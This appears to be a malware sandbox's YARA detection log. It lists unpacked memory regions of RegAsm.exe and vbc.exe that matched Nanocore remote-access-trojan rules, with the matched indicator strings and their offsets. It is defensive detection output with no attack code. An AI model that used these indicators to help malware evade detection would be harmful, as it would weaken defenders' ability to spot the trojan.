5.2.RegAsm.exe.3b67402.28.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.RegAsm.exe.3b67402.28.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.RegAsm.exe.2a5109c.23.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.RegAsm.exe.2a5109c.23.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.RegAsm.exe.c00000.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
5.2.RegAsm.exe.c00000.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
5.2.RegAsm.exe.e1e8a4.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
5.2.RegAsm.exe.e1e8a4.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
5.2.RegAsm.exe.a40000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
5.2.RegAsm.exe.a40000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
5.2.RegAsm.exe.5b0000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
5.2.RegAsm.exe.5b0000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
4.2.vbc.exe.3486e00.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3486e00.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.vbc.exe.3486e00.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3486e00.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegAsm.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.RegAsm.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.RegAsm.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegAsm.exe.5c0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
5.2.RegAsm.exe.5c0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
4.2.vbc.exe.340edc0.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0x32dad:$x1: NanoCore.ClientPluginHost 0x82dcd:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x32dea:$x2: IClientNetworkHost 0x82e0a:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.340edc0.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x32b25:$x1: NanoCore Client.exe 0x82b45:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0x32dad:$x2: NanoCore.ClientPluginHost 0x82dcd:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0x343e6:$s1: PluginCommand 0x84406:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x343da:$s2: FileCommand 0x843fa:$s2: FileCommand 0x1086b:$s3: PipeExists 0x3528b:$s3: PipeExists 0x16622:$s4: PipeCreated 0x3b042:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost 0x32dd7:$s5: IClientLoggingHost 0x82df7:$s5: IClientLoggingHost
4.2.vbc.exe.340edc0.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.340edc0.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x32b15:$a: NanoCore 0x32b25:$a: NanoCore 0x32d59:$a: NanoCore 0x32d6d:$a: NanoCore 0x32dad:$a: NanoCore 0x82b35:$a: NanoCore 0x82b45:$a: NanoCore 0x82d79:$a: NanoCore 0x82d8d:$a: NanoCore 0x82dcd:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x32b74:$b: ClientPlugin 0x32d76:$b: ClientPlugin 0x32db6:$b: ClientPlugin
4.2.vbc.exe.df0000.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.RegAsm.exe.5b0000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.RegAsm.exe.5b0000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.RegAsm.exe.5a0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.RegAsm.exe.5a0000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
5.2.RegAsm.exe.e80000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
5.2.RegAsm.exe.e80000.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
5.2.RegAsm.exe.2a44ddc.25.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.RegAsm.exe.2a44ddc.25.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
4.2.vbc.exe.3486e00.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3486e00.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.vbc.exe.3486e00.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3486e00.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.vbc.exe.3627c48.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3627c48.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.vbc.exe.3627c48.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3627c48.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.RegAsm.exe.e10000.17.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.RegAsm.exe.e10000.17.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
5.2.RegAsm.exe.a50000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
5.2.RegAsm.exe.a50000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
5.2.RegAsm.exe.de4629.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.RegAsm.exe.de4629.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
5.2.RegAsm.exe.de4629.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.de0000.14.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.RegAsm.exe.de0000.14.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.RegAsm.exe.de0000.14.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.c10000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
5.2.RegAsm.exe.c10000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
5.2.RegAsm.exe.cb0000.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
5.2.RegAsm.exe.cb0000.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
5.2.RegAsm.exe.3b73634.26.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.RegAsm.exe.3b73634.26.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
4.2.vbc.exe.3436de0.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0x5adad:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x5adea:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5e91d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3436de0.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x5ab25:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0x5adad:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0x5c3e6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x5c3da:$s2: FileCommand 0x1086b:$s3: PipeExists 0x5d28b:$s3: PipeExists 0x16622:$s4: PipeCreated 0x63042:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost 0x5add7:$s5: IClientLoggingHost
4.2.vbc.exe.3436de0.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3436de0.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x5ab15:$a: NanoCore 0x5ab25:$a: NanoCore 0x5ad59:$a: NanoCore 0x5ad6d:$a: NanoCore 0x5adad:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x5ab74:$b: ClientPlugin 0x5ad76:$b: ClientPlugin 0x5adb6:$b: ClientPlugin 0xe27b:$c: ProjectData 0x5ac9b:$c: ProjectData 0xec82:$d: DESCrypto 0x5b6a2:$d: DESCrypto 0x1664e:$e: KeepAlive
5.2.RegAsm.exe.de0000.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
5.2.RegAsm.exe.de0000.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
5.2.RegAsm.exe.de0000.14.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.5c0000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.RegAsm.exe.5c0000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.0.RegAsm.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.0.RegAsm.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.0.RegAsm.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.0.RegAsm.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegAsm.exe.c00000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
5.2.RegAsm.exe.c00000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
4.0.vbc.exe.df0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.RegAsm.exe.6c0000.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
5.2.RegAsm.exe.6c0000.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
5.0.RegAsm.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.0.RegAsm.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.0.RegAsm.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.0.RegAsm.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegAsm.exe.660000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
5.2.RegAsm.exe.660000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
5.2.RegAsm.exe.a50000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
5.2.RegAsm.exe.a50000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
5.2.RegAsm.exe.e10000.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.RegAsm.exe.e10000.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
5.2.RegAsm.exe.e14c9f.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
5.2.RegAsm.exe.e14c9f.16.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
5.2.RegAsm.exe.2a5109c.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d53:$x1: NanoCore.ClientPluginHost 0x1c371:$x1: NanoCore.ClientPluginHost 0x22384:$x1: NanoCore.ClientPluginHost 0x2be2b:$x1: NanoCore.ClientPluginHost 0x36297:$x1: NanoCore.ClientPluginHost 0x413c5:$x1: NanoCore.ClientPluginHost 0x4d1a7:$x1: NanoCore.ClientPluginHost 0x58f36:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d8c:$x2: IClientNetworkHost 0x1c3aa:$x2: IClientNetworkHost 0x2bf88:$x2: IClientNetworkHost 0x362d0:$x2: IClientNetworkHost 0x413df:$x2: IClientNetworkHost 0x4d1c1:$x2: IClientNetworkHost 0x58f73:$x2: IClientNetworkHost
5.2.RegAsm.exe.2a5109c.23.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x15d53:$x2: NanoCore.ClientPluginHost 0x1c371:$x2: NanoCore.ClientPluginHost 0x22384:$x2: NanoCore.ClientPluginHost 0x2be2b:$x2: NanoCore.ClientPluginHost 0x36297:$x2: NanoCore.ClientPluginHost 0x413c5:$x2: NanoCore.ClientPluginHost 0x4d1a7:$x2: NanoCore.ClientPluginHost 0x58f36:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0x2cd81:$s3: PipeExists 0xe576:$s4: PipeCreated 0x15e70:$s4: PipeCreated 0x1c48c:$s4: PipeCreated 0x22462:$s4: PipeCreated 0x2c021:$s4: PipeCreated 0x363e2:$s4: PipeCreated 0x423fa:$s4: PipeCreated 0x4ef52:$s4: PipeCreated 0x5c389:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
5.2.RegAsm.exe.2a5109c.23.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a9b:$a: NanoCore 0x15af4:$a: NanoCore 0x15b27:$a: NanoCore 0x15d53:$a: NanoCore 0x15dcf:$a: NanoCore 0x163e8:$a: NanoCore 0x16531:$a: NanoCore 0x16a05:$a: NanoCore 0x16cec:$a: NanoCore 0x16d03:$a: NanoCore 0x1c371:$a: NanoCore 0x1c3eb:$a: NanoCore 0x22384:$a: NanoCore 0x223ce:$a: NanoCore 0x23028:$a: NanoCore 0x2be2b:$a: NanoCore 0x2bf15:$a: NanoCore 0x2cd8c:$a: NanoCore
